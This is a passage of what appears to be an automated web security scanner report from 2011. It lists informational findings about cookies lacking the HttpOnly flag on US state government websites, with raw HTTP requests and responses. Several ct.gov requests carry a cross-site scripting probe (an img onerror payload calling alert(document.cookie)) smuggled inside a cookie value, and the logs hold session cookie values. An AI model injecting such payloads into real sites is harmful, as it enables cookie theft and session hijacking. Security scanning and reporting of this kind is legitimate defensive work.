Cookie: BIGipServer=348127242.20480.0000; __utmv=; JSESSIONID=cx3hS880vVX_KdjjM_; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.94.8.1304162601730;

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:30:07 GMT
Server: Apache
Location: http://www.colorado.gov/apps/feedback/servlet/begin
Vary: Accept-Encoding
Content-Length: 235
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServer=kB2L+3pjrddrIIEHgshLK90xd+63v/FKMQQe7ZjTkgYM2ND91AVrjihgZkommzfjTwym1t8J5orH8A==; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.colorado.gov/apps/feedback/servlet/b
...[SNIP]...

14.495. http://www.conwaygreene.com/nmsu/lpext.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.conwaygreene.com
Path:   /nmsu/lpext.dll

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nmsu/lpext.dll HTTP/1.1
Host: www.conwaygreene.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: no-cache
Expires: fri, 29 jun 1973 12:00:00 GMT
Content-Length: 1475
Set-Cookie: nmsu/lpext.dll/uid=4DBC0844; expires=Mon, 30-Apr-2012 12:39:30 GMT; path=/;
Set-Cookie: nmsu/lpext.dll/sid=4DBC0845; path=/;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
   <meta name="template-type" content="lp-component-error">
   <meta http-equiv="Content-Type" content="text/html; char
...[SNIP]...

14.496. http://www.ct.gov/ctportal/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ctportal/cwp/view.asp?a=843&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30177
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D843%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...

14.497. http://www.ct.gov/ctportal/site/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/site/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ctportal/site/default.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30349
Content-Type: text/html
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fctportal%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...

14.498. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/taxonomy/taxonomy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ctportal/taxonomy/taxonomy.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27258
Content-Type: text/html
Set-Cookie: ctportalPNavCtr%5FGID=; path=/ctportal
Set-Cookie: ctportalPNavCtr=; path=/ctportal
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&AA=False&LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...

14.499. http://www.ct.gov/dcp/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /dcp/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcp/cwp/view.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: browse.asp?A=3
Content-Length: 135
Content-Type: text/html
Set-Cookie: dcp=LoginJumpBackTo=%2Fdcp%2Fcwp%2Fview%2Easp%3F&AA=False&UA=Guest&AN=0&Q=CF83CBC7&TC=06106&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=True&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/dcp
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="browse.asp?A=3">here</a>.</body>

14.500. http://www.ct.gov/dep/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /dep/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dep/cwp/view.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: browse.asp?A=3
Content-Length: 135
Content-Type: text/html
Set-Cookie: dep=LoginJumpBackTo=%2Fdep%2Fcwp%2Fview%2Easp%3F&AA=False&UA=Guest&AN=0&Q=CF83CBC7&TC=06106&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=True&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/dep
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="browse.asp?A=3">here</a>.</body>

14.501. http://www.ct.gov/dmv/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /dmv/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmv/cwp/view.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: browse.asp?A=3
Content-Length: 135
Content-Type: text/html
Set-Cookie: dmv=LoginJumpBackTo=%2Fdmv%2Fcwp%2Fview%2Easp%3F&AA=False&UA=Guest&AN=0&Q=CF83CBC7&TC=17603&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/dmv
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="browse.asp?A=3">here</a>.</body>

14.502. http://www.ct.gov/drs/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /drs/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /drs/cwp/view.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: browse.asp?A=3
Content-Length: 135
Content-Type: text/html
Set-Cookie: drs=LoginJumpBackTo=%2Fdrs%2Fcwp%2Fview%2Easp%3F&AA=False&UA=Guest&AN=0&Q=CF83CBC7&TC=17603&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/drs
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="browse.asp?A=3">here</a>.</body>

14.503. http://www.ct.gov/opm/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /opm/cwp/view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opm/cwp/view.asp HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 30 Apr 2011 12:31:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: browse.asp?A=3
Content-Length: 135
Content-Type: text/html
Set-Cookie: opm=LoginJumpBackTo=%2Fopm%2Fcwp%2Fview%2Easp%3F&AA=False&UA=Guest&AN=0&Q=CF83CBC7&TC=17603&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/opm
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="browse.asp?A=3">here</a>.</body>

14.504. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /business_operations/state_purchasing/myflorida_marketplace

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business_operations/state_purchasing/myflorida_marketplace HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:01:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:01:54 GMT; path=/
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 16682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

14.505. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD; __utmz=101745940.1304125350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101745940.70297556.1304125350.1304125350.1304125350.1; __utmc=101745940; __utmb=101745940.1.10.1304125350

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:02:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:02:33 GMT; path=/
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 13621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

14.506. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; __utmz=101745940.1304125350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101745940.70297556.1304125350.1304125350.1304125350.1; __utmc=101745940; __utmb=101745940.2.10.1304125350; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD4F145F707697652604E2877FC7972CDC4DDE8FC33A71829F781F0B634D3965FD40A62CF73B75CB30108FBA03C34499686

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-language: en-US
Content-Type: text/html; charset=utf-8
Date: Sat, 30 Apr 2011 01:02:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Served-by: www.dms.myflorida.com
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: is_logged_in=deleted; expires=Fri, 30-Apr-2010 01:02:41 GMT; path=/
Vary: User-Agent,Accept-Encoding
X-Powered-By: eZ Publish
Connection: keep-alive
Content-Length: 11718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

14.507. http://www.dms.myflorida.com/index.php/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dms.myflorida.com
Path:   /index.php/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing HTTP/1.1
Host: www.dms.myflorida.com
Proxy-Connection: keep-alive
Referer: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32692770.1813902578.1304123784.1304123784.1304123784.1; __utmb=32692770; __utmc=32692770; __utmz=32692770.1304123784.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); eZSESSIDe55d964d176b2c8162b80453de81825b=ri7koba47mbo3o29s4cl4v2cc2; AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD466C21E8F4F13B81D8DB9E58AF986261F4AAD7E34B110C4BCD362EEBE28314B02EAFE8E092D60A0EF7C4EA5684F3444FD; __utmz=101745940.1304125350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101745940.70297556.1304125350.1304125350.1304125350.1; __utmc=101745940; __utmb=101745940.2.10.1304125350

Response

HTTP/1.1 301 Moved Permanently
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 30 Apr 2011 01:02:39 GMT
Location: http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: AWSELB=A3C1B975127510B99E0B3D4AD4BCFCB5BE329A4BD4F145F707697652604E2877FC7972CDC4DDE8FC33A71829F781F0B634D3965FD40A62CF73B75CB30108FBA03C34499686;PATH=/;MAX-AGE=3600
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 412

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.dms.myflorid
...[SNIP]...

14.508. http://www.elearningnc.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elearningnc.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.elearningnc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:32:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=988821121; expires=Sun, 29-Apr-2012 12:32:01 GMT; path=/
